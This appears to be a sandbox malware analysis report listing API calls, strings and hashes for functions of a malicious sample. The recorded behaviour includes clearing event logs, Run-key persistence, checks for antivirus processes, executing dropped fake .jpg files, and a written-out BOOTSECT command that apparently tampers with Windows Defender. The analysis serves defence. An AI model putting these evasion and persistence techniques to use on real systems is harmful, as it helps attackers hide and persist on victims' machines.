API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: fb0d4a0df52b6f69596e1d6294ffcc4ecb4cbbddf44354b1ae9afe16880bf32e
Instruction ID: d8bc8eb87b30d8eca42fdae0fd43d19e56bd30c3492ac6cf630ed6b994ef6933
Opcode Fuzzy Hash: fb0d4a0df52b6f69596e1d6294ffcc4ecb4cbbddf44354b1ae9afe16880bf32e
Instruction Fuzzy Hash: D531F879D0161D9BDB20EFA4D949BCDBBB8BF08300F1045AAE40DAB250E7709B859F45

Function 03601B13 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 03601B1F
IsDebuggerPresent.KERNEL32 ref: 03601BEB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03601C04
UnhandledExceptionFilter.KERNEL32(?), ref: 03601C0E

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 1c8fd5331b7708149704351a837decc37c1486ab642b08b0c57408713467206d
Instruction ID: c183bb0d35afcec8393a5b869ff3c071302038efbe232029bd7bcd487bf71cae
Opcode Fuzzy Hash: 1c8fd5331b7708149704351a837decc37c1486ab642b08b0c57408713467206d
Instruction Fuzzy Hash: FC31FA79D012189BDB20EFA4D9497CDBBF8AF09300F10559AE40DAB294E7749B848F45

Function 10023788 Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 10024068: GetWindowLongA.USER32(?,000000F0), ref: 10024074

GetKeyState.USER32(00000010), ref: 100237AC
GetKeyState.USER32(00000011), ref: 100237B5
GetKeyState.USER32(00000012), ref: 100237BE
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 100237D4

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: bea600ccae8000340be853ae32cd0e0038e76babfc3a9586b9b3bd9eba886e2c
Instruction ID: 0e0cb0db4c275f2d7c7f506f58b8571c57eb2541a6533377d6a11ec2e5cec213
Opcode Fuzzy Hash: bea600ccae8000340be853ae32cd0e0038e76babfc3a9586b9b3bd9eba886e2c
Instruction Fuzzy Hash: 11F082FA34439E26E970B2643C82FD91214CF40BD0F924425F741AA5D68BA1DC425670

Function 10004A84 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 10010D86: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 10010D95
Part of subcall function 10010D86: GetProcAddress.KERNEL32(?,OpenProcessToken), ref: 10010DA7
Part of subcall function 10010D86: GetProcAddress.KERNEL32(?,AdjustTokenPrivileges), ref: 10010DB9
Part of subcall function 10010D86: GetProcAddress.KERNEL32(?,LookupPrivilegeValueA), ref: 10010DCB
Part of subcall function 10010D86: LoadLibraryA.KERNEL32(kernel32.dll), ref: 10010DD9
Part of subcall function 10010D86: GetProcAddress.KERNEL32(?,GetCurrentProcess), ref: 10010DEB

ExitWindowsEx.USER32(?,00000000), ref: 10004A9C

Part of subcall function 10010D86: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 10010E4F
Part of subcall function 10010D86: GetProcAddress.KERNEL32(?,GetLastError), ref: 10010E61
Part of subcall function 10010D86: CloseHandle.KERNEL32(?), ref: 10010E79
Part of subcall function 10010D86: FreeLibrary.KERNEL32(00000000), ref: 10010E89
Part of subcall function 10010D86: FreeLibrary.KERNEL32(00000000), ref: 10010E99

Strings

SeShutdownPrivilege, xrefs: 10004A89
SeShutdownPrivilege, xrefs: 10004AA4

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
String ID: SeShutdownPrivilege$SeShutdownPrivilege
API String ID: 3789203340-2417394338
Opcode ID: 03341c3f249d7150522dd4abd1d85efdd96b4e3ad4f4b2f7f0339a4ad1641a17
Instruction ID: 55b2a41891b40a8a8447710bf45c8648c8cd8d2901dace3ec3a87922eceecef3
Opcode Fuzzy Hash: 03341c3f249d7150522dd4abd1d85efdd96b4e3ad4f4b2f7f0339a4ad1641a17
Instruction Fuzzy Hash: 89D0C976AC024937E511D6D4BC47FCA36188B55715F404061FB485D281E9E2B59002A3

Function 10004C34 Relevance: 4.6, APIs: 3, Instructions: 54COMMON

Download Yara Rule

APIs

OpenEventLogA.ADVAPI32(00000000,1002EFBC), ref: 10004CC9
ClearEventLogA.ADVAPI32(00000000,00000000), ref: 10004CE0
CloseEventLog.ADVAPI32(00000000), ref: 10004CEA

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Event$ClearCloseOpen
String ID:
API String ID: 1391105993-0
Opcode ID: ece43b92ce0693e30fe8f5f6792710d0633e89e434948c707a9fc16e9b27f653
Instruction ID: 34bd33876efed55074ddf4442b816e081dc77f01d63059cb021eafba16e148ee
Opcode Fuzzy Hash: ece43b92ce0693e30fe8f5f6792710d0633e89e434948c707a9fc16e9b27f653
Instruction Fuzzy Hash: FC215CB0D0629DDFFB40CF90C945AAEBB71FB40348F624099D9016B244CB795A44DB89

Function 1001CAA8 Relevance: 4.5, APIs: 3, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3754e1ad5e5a9fa84a9316871dd420c348ea7447b61eb3ca49bf00eb2e6fa5b1
Instruction ID: 64d772064bde2c22d48409e1726ca829caadb69427a7bd0ef02e6c220f3b0157
Opcode Fuzzy Hash: 3754e1ad5e5a9fa84a9316871dd420c348ea7447b61eb3ca49bf00eb2e6fa5b1
Instruction Fuzzy Hash: C2F0EC3560411DABDF02DF60CC49EAE3BB8FF04288F509024FC59D9060EB30DAA5EB91

Function 024000CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

ntdl, xrefs: 02400142
l, xrefs: 02400149

Memory Dump Source

Source File: 00000007.00000003.2808702867.0000000002400000.00000040.00001000.00020000.00000000.sdmp, Offset: 02400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_2400000_lXAMaI.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction ID: 585a64ffb793c65cb6698cf3ae27e135399c06579ad944ba0b1c98cc34cfde34
Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction Fuzzy Hash: AC118EB5700A01AFCB15AF19D848A0EBBF6FF88710B21816EE00597750EB349A618FD5

Function 02400643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

ntdl, xrefs: 02400684
l, xrefs: 0240068E

Memory Dump Source

Source File: 00000007.00000003.2808702867.0000000002400000.00000040.00001000.00020000.00000000.sdmp, Offset: 02400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_2400000_lXAMaI.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction ID: d9c17ab0d0d0510f8c6ba86182aa527fd9465fdc333406fc00077f3727c55bfd
Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction Fuzzy Hash: B2018871700114AFCB14DF99C845EAEFBBAEF84754F0444A9F904A7350DA70DE408BA1

Function 035A1CD8 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 035A1CEE

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 555f7d194e3fb8ef8b1d9d51e3ebcb6ba17335466cd01d7e7c1fb92ff86a3a05
Instruction ID: 933b8a4ed497490c24d4780158e636d5cbf36520cad97113e5cb8b9a0dd51acd
Opcode Fuzzy Hash: 555f7d194e3fb8ef8b1d9d51e3ebcb6ba17335466cd01d7e7c1fb92ff86a3a05
Instruction Fuzzy Hash: 275171B1D10A098FEB54CF58E4C1BAEBBF4FB44311F18846AD406EB264E7B49A45DF50

Function 035AAC3B Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 035AAC3B

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4f174a566eab09e064c113e73272539c481f8547c49a127a6d5336ba39dad68b
Instruction ID: adb3dfcff03967831883fa38b583c173c73dea799ea89508d4b4e5a9e2372fc4
Opcode Fuzzy Hash: 4f174a566eab09e064c113e73272539c481f8547c49a127a6d5336ba39dad68b
Instruction Fuzzy Hash: C6A01234201101CFC380DE72510560835DC6901180300C01454C0D0234F62080056F04

Function 02FF8E3A Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3509260744.0000000002E4B000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true

Associated: 00000007.00000002.3509065255.0000000002DE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509093359.0000000002DE1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509159172.0000000002E06000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509189589.0000000002E1C000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509228018.0000000002E45000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509506069.00000000030AF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2de0000_lXAMaI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f9e169f9404ce9de261366012b15bd887c1228c24363f1a262628df1491180c
Instruction ID: 47e0beb626a50bb67e04615d750a288ae2b417f99b9d13ce530daf791f73ec59
Opcode Fuzzy Hash: 8f9e169f9404ce9de261366012b15bd887c1228c24363f1a262628df1491180c
Instruction Fuzzy Hash: 682120B4609342EFC714EF25D8506AABBA2AFC1340F64893DE4EA07751E7309914CF42

Function 00410335 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3502521914.0000000000410000.00000040.00001000.00020000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_lXAMaI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4e49f0db8203b01ae89f7faa02107dacc36bcd3f8e781a0e5cde80aca7094df
Instruction ID: 3236bdae62f1c33b541e24736e64ea58474203ee5991a3f42d79e1559e832f05
Opcode Fuzzy Hash: d4e49f0db8203b01ae89f7faa02107dacc36bcd3f8e781a0e5cde80aca7094df
Instruction Fuzzy Hash: 071174B4E00209DFCB04CF95C590AAEBBF1FB48304F20819AD815AB350D379AE82DF94

Function 1000244A Relevance: 65.0, APIs: 21, Strings: 16, Instructions: 211filesleeplibraryCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 1000245E

Part of subcall function 1000241C: SetFileAttributesA.KERNEL32(?,00000006,?,1000B014,C:\ProgramData\Microsoft\Program\xxxxxx.jpg,00000001), ref: 10002431

Part of subcall function 1000241C: SetFileAttributesA.KERNEL32(?,00000080,?,1000B014,C:\ProgramData\Microsoft\Program\xxxxxx.jpg,00000001), ref: 10002442

Sleep.KERNEL32(000001F4), ref: 100024A5
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\xxxxxx.jpg1), ref: 100024B0
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\xxxxxx.jpg), ref: 100024BB
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\xxxxxx), ref: 100024C6
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\xxxxxx.jpg), ref: 100024D1
Sleep.KERNEL32(000001F4), ref: 100024DC
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100024F0
LoadLibraryA.KERNEL32(KERNEL32.dll,GetTempPathA), ref: 100025BA
GetProcAddress.KERNEL32(00000000), ref: 100025C1
GetTickCount.KERNEL32 ref: 10002640
GetTickCount.KERNEL32 ref: 10002694
lstrcatA.KERNEL32(?,?), ref: 100026BF
CreateFileA.KERNEL32(C:\ProgramData\Microsoft\Program\xxxxxx.jpg,40000000,00000002,00000000,00000002,00000080,00000000), ref: 100026DC
WriteFile.KERNEL32(000000FF,?,?,00000000), ref: 10002731
CloseHandle.KERNEL32(000000FF), ref: 1000273E
Sleep.KERNEL32(000001F4), ref: 10002749

Part of subcall function 100122A7: GetFileAttributesA.KERNEL32(00000000,1000B307,c:\xxxx.ini,00000000), ref: 100122AB
Part of subcall function 100122A7: GetLastError.KERNEL32 ref: 100122B6

ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 10002786
TerminateProcess.KERNEL32(00000000,00000000), ref: 10002794
ExitProcess.KERNEL32 ref: 1000279C

Strings

KERNEL32.dll, xrefs: 100025B3, 100025B9
C:\ProgramData\Microsoft\Program\xxxxxx.jpg, xrefs: 100026D7
C:\ProgramData\Microsoft\Program\xxxxxx.jpg, xrefs: 100024B6
C:\ProgramData\Microsoft\Program\xxxxxx.jpg, xrefs: 10002760
C:\ProgramData\Microsoft\Program\xxxxxx.jpg1, xrefs: 10002466
GetTempPathA, xrefs: 100025AC, 100025B2
Ru%d%s, xrefs: 1000269B, 100026A1
C:\ProgramData\Microsoft\Program\xxxxxx.jpg, xrefs: 10002751
C:\ProgramData\Microsoft\Program\xxxxxx, xrefs: 100024C1
C:\ProgramData\Microsoft\Program\xxxxxx, xrefs: 10002484
open, xrefs: 1000277F
Plugin32.dll, xrefs: 10002647, 1000264D
C:\ProgramData\Microsoft\Program\xxxxxx.jpg, xrefs: 10002475
C:\ProgramData\Microsoft\xxxxxx.jpg, xrefs: 100024CC
C:\ProgramData\Microsoft\xxxxxx.jpg, xrefs: 10002493
C:\ProgramData\Microsoft\Program\xxxxxx.jpg1, xrefs: 100024AB

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$DeleteSleep$Attributes$CountProcessTick$AddressCloseCreateErrorExecuteExitHandleLastLibraryLoadModuleNameProcShellTerminateWritelstrcat
String ID: C:\ProgramData\Microsoft\Program\xxxxxx$C:\ProgramData\Microsoft\Program\xxxxxx$C:\ProgramData\Microsoft\Program\xxxxxx.jpg$C:\ProgramData\Microsoft\Program\xxxxxx.jpg$C:\ProgramData\Microsoft\Program\xxxxxx.jpg$C:\ProgramData\Microsoft\Program\xxxxxx.jpg$C:\ProgramData\Microsoft\Program\xxxxxx.jpg$C:\ProgramData\Microsoft\Program\xxxxxx.jpg1$C:\ProgramData\Microsoft\Program\xxxxxx.jpg1$C:\ProgramData\Microsoft\xxxxxx.jpg$C:\ProgramData\Microsoft\xxxxxx.jpg$GetTempPathA$KERNEL32.dll$Plugin32.dll$Ru%d%s$open
API String ID: 4146983569-3149774944
Opcode ID: 18c08dbdd2fff78fbee68d20fd809952499118f08c6cc6e3b8372c403e61a3f0
Instruction ID: 94e2dbf2324d57ab845876620674794d772a9e892ce2b1aff0a8fbb253d7e4eb
Opcode Fuzzy Hash: 18c08dbdd2fff78fbee68d20fd809952499118f08c6cc6e3b8372c403e61a3f0
Instruction Fuzzy Hash: E7A181719482A8EEEB21C774CC4DBDA7B74AB15305F5441C8F24D6A1C2DBB61B988F32

Function 100092CC Relevance: 59.7, APIs: 17, Strings: 17, Instructions: 209sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 10008E2E: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10008E45
Part of subcall function 10008E2E: Process32First.KERNEL32(?,00000128), ref: 10008E62

Sleep.KERNEL32(00000BB8), ref: 10009659

Part of subcall function 100122A7: GetFileAttributesA.KERNEL32(00000000,1000B307,c:\xxxx.ini,00000000), ref: 100122AB
Part of subcall function 100122A7: GetLastError.KERNEL32 ref: 100122B6

Strings

360tray.exe, xrefs: 100092F8
SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run, xrefs: 10009351
XXX3XXX, xrefs: 10009327
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000932C
360Safetray, xrefs: 1000934C
XXX3XXX, xrefs: 1000962F
360Tray.exe, xrefs: 100092E2
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000952D
XXX3XXX, xrefs: 1000957F
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 100095DD
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 100093A4
C:\xxxx.inst.ini, xrefs: 10009310
XXX3XXX, xrefs: 100093F6
QQPCTray.exe, xrefs: 10009420
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 10009468
qqpctray.exe, xrefs: 100094E4
XXX3XXX, xrefs: 100094BA

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileFirstLastProcess32SleepSnapshotToolhelp32
String ID: 360Safetray$360Tray.exe$360tray.exe$C:\xxxx.inst.ini$QQPCTray.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run$XXX3XXX$XXX3XXX$XXX3XXX$XXX3XXX$XXX3XXX$qqpctray.exe
API String ID: 1205681329-2413456647
Opcode ID: 78f6ca53167916a293123c50b219ba434f06da4b498dbce86659824278d0b885
Instruction ID: 6d27ae4feb9da84dff0a950164babe52361a326fd29512cabe835bdc4ece1554
Opcode Fuzzy Hash: 78f6ca53167916a293123c50b219ba434f06da4b498dbce86659824278d0b885
Instruction Fuzzy Hash: 2D816FB1904268ABFB24DB50CC86BE97778FB14340F2040E8F70DA6191EB75AE85CF55

Function 10009668 Relevance: 57.9, APIs: 12, Strings: 21, Instructions: 172sleepprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 10008E2E: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10008E45
Part of subcall function 10008E2E: Process32First.KERNEL32(?,00000128), ref: 10008E62

CreateDirectoryA.KERNEL32(?,00000000), ref: 1000969D
CreateDirectoryA.KERNEL32(?,00000000), ref: 1000982B
SetFileAttributesA.KERNEL32(?,00000002,?,?,?,1000D050), ref: 100096D8

Part of subcall function 1000DC70: std::ios_base::precision.LIBCPMTD ref: 1000DEBB

Part of subcall function 10008E2E: Process32Next.KERNEL32(?,00000128), ref: 10008E8D
Part of subcall function 10008E2E: CloseHandle.KERNEL32(?,00000002,00000000), ref: 10008EC3

Sleep.KERNEL32(000001F4), ref: 10009701
WinExec.KERNEL32(C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /l & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /c "Windows-Defender" /r & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /h /o /l & exit,00000000), ref: 1000972C
CreateDirectoryA.KERNEL32(?,00000000), ref: 10009764
SetFileAttributesA.KERNEL32(?,00000002,?,?,?,1000D050), ref: 1000979F
Sleep.KERNEL32(000001F4), ref: 100097C8
WinExec.KERNEL32(C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /l & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /c "Windows-Defender" /r & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /h /o /l & exit,00000000), ref: 100097F3
SetFileAttributesA.KERNEL32(?,00000002,?,?,?,1000D050), ref: 10009866
Sleep.KERNEL32(000001F4), ref: 1000988F
WinExec.KERNEL32(C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /l & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /c "Windows-Defender" /r & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /h /o /l & exit,00000000), ref: 100098BA

Strings

Create Successed!, xrefs: 100097AA
C:\ProgramData\Microsoft\eHome, xrefs: 10009897
Create Successed!, xrefs: 100096E3
C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /l & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /c "Windows-Defender" /r & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /h /o /l & exit, xrefs: 10009727
C:\ProgramData\Microsoft\eHome, xrefs: 10009751
C:\ProgramData\Microsoft\eHome\BOOTSECT.exe, xrefs: 10009718
: Not Exist, xrefs: 10009773
C:\ProgramData\Microsoft\eHome, xrefs: 10009818
: Not Exist, xrefs: 1000983A
Create Successed!, xrefs: 10009871
C:\ProgramData\Microsoft\eHome, xrefs: 1000968A
C:\ProgramData\Microsoft\eHome, xrefs: 10009709
C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /l & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /c "Windows-Defender" /r & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /h /o /l & exit, xrefs: 100097EE
msmpeng.exe, xrefs: 10009670
: Not Exist, xrefs: 100096AC
securityhealthsystray.exe, xrefs: 10009737
C:\ProgramData\Microsoft\eHome\BOOTSECT.exe, xrefs: 100097DF
mpcopyaccelerator.exe, xrefs: 100097FE
C:\ProgramData\Microsoft\eHome, xrefs: 100097D0
C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /l & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /c "Windows-Defender" /r & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /h /o /l & exit, xrefs: 100098B5
C:\ProgramData\Microsoft\eHome\BOOTSECT.exe, xrefs: 100098A6

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Create$AttributesDirectoryExecFileSleep$Process32$CloseFirstHandleNextSnapshotToolhelp32std::ios_base::precision
